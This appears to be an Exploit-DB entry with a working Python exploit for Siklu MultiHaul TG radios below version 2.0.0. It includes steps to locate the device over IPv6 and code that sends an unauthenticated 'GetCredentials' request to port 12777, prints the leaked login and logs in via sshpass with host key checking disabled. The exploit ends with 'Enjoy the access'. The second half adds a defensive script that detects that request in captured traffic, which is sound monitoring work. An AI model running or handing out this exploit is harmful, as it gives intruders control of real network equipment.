Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure

  • Author: semaja2
    Date: 2024-03-28
  • Source: https://www.exploit-db.com/exploits/51932/
# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
# Date: 28-02-2024
# Exploit Author: semaja2
# Vendor Homepage: https://siklu.com/
# Software Link: https://partners.siklu.com/home/frontdoor
# Version: < 2.0.0
# Tested on: 2.0.0
# CVE : None assigned
#
# Instructions
# 1. Perform IPv6 host detect by pinging the all-hosts multicast address for the interface attached to the device
# `ping6 -I en7 -c 2 ff02::1`
# 2. Review IPv6 neighbours and identify the target device based on the vendor component of the MAC address
# `ip -6 neigh show dev en7`
# 3. Execute script
# `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
# 4. Enjoy the access

import socket
import sys
import os

address = sys.argv[1]  # the target (IPv6 address, link-local form carries the %zone suffix)
port = 12777           # management service port on the device

# Captured command, sends "GetCredentials" to obtain random generated username/password
cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")

# Resolve the IPv6 address (getaddrinfo keeps the %zone scope id) and open a TCP connection
addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
(family, socktype, proto, canonname, sockaddr) = addrinfo[0]
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.connect(sockaddr)
s.sendall(cmd)
data = s.recv(200)
s.close()
output = data.decode("latin-1")  # byte-for-byte mapping, same as "".join(map(chr, data))

# Split output on '#', then remove trailing noise as string length is always 35
splits = output.split('#')
username = splits[1][:35]
password = splits[2][:35]
print('Username: ', username)
print('Password: ', password)
os.system("sshpass -p {password} ssh -o StrictHostKeyChecking=no {address} -l {username}".format(address = address, username = username, password = password))
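For anyone monitoring a network that contains these radios, the useful artefact on this page is the request itself: a single unauthenticated TCP frame to port 12777 carrying the ASCII command name "GetCredentials". The example below is added here and is not part of semaja2's exploit or of any Siklu software; it is a small detection routine that scans captured TCP payloads for that command. Its view of the frame layout is inferred from the one captured frame above (a 4-byte big-endian length of the remainder, and the command name preceded by a 2-byte big-endian string length); the sample flows, including the hypothetical "GetStatus" command name and the addresses, are constructed for the test and carry no meaning beyond it.

```python
import struct

MGMT_PORT = 12777                       # management service port used by the exploit
FLAGGED_COMMANDS = {b"GetCredentials"}  # command names worth alerting on

# The captured request frame from the exploit above (only used here as test input)
CAPTURED_REQUEST = bytes.fromhex(
    "000000290FFF000100000001000100000000800100010000000E"
    "47657443726564656E7469616C730000000000"
)


def frame_length_consistent(payload: bytes) -> bool:
    """Inferred from the captured frame: the first 4 bytes hold the big-endian
    length of everything that follows them (0x29 = 41 = 45 - 4)."""
    if len(payload) < 4:
        return False
    return struct.unpack(">I", payload[:4])[0] == len(payload) - 4


def extract_command(payload: bytes):
    """Return the length-prefixed ASCII command name found in a management frame, or None.

    Assumption (inferred from the captured frame): the name is immediately preceded
    by a 2-byte big-endian length. We scan for any such prefix followed by that many
    purely alphabetic ASCII bytes, so the parser does not depend on fixed offsets.
    """
    for i in range(len(payload) - 2):
        n = struct.unpack(">H", payload[i:i + 2])[0]
        if 4 <= n <= 64 and i + 2 + n <= len(payload):
            cand = payload[i + 2:i + 2 + n]
            if cand.isascii() and cand.isalpha():
                return cand
    return None


def flag_credential_requests(flows):
    """flows: iterable of (src, dst, dport, payload) tuples for client->server data.
    Returns one alert dict per payload that carries a flagged command to the
    management port."""
    alerts = []
    for src, dst, dport, payload in flows:
        if dport != MGMT_PORT:
            continue
        cmd = extract_command(payload)
        if cmd in FLAGGED_COMMANDS:
            alerts.append({
                "src": src,
                "dst": dst,
                "command": cmd.decode("ascii"),
                "length_ok": frame_length_consistent(payload),
            })
    return alerts


# Constructed sample flows: one real capture, one benign-looking command, one unrelated port
SAMPLE_FLOWS = [
    ("fe80::aaaa:1", "fe80::bbbb:1", MGMT_PORT, CAPTURED_REQUEST),
    ("fe80::aaaa:1", "fe80::bbbb:1", MGMT_PORT, b"\x00\x00\x00\x0b\x00\x09GetStatus"),
    ("fe80::aaaa:1", "fe80::bbbb:1", 22, b"SSH-2.0-OpenSSH_9.6\r\n"),
]

if __name__ == "__main__":
    for alert in flag_credential_requests(SAMPLE_FLOWS):
        print("ALERT unauthenticated credential request:", alert)
```

Because the service answers this request without any authentication, a single hit from a source that is not a known management host is already actionable; pairing the alert with an SSH login to the same radio shortly afterwards, as the exploit does in its last line, makes the sequence hard to mistake for normal administration.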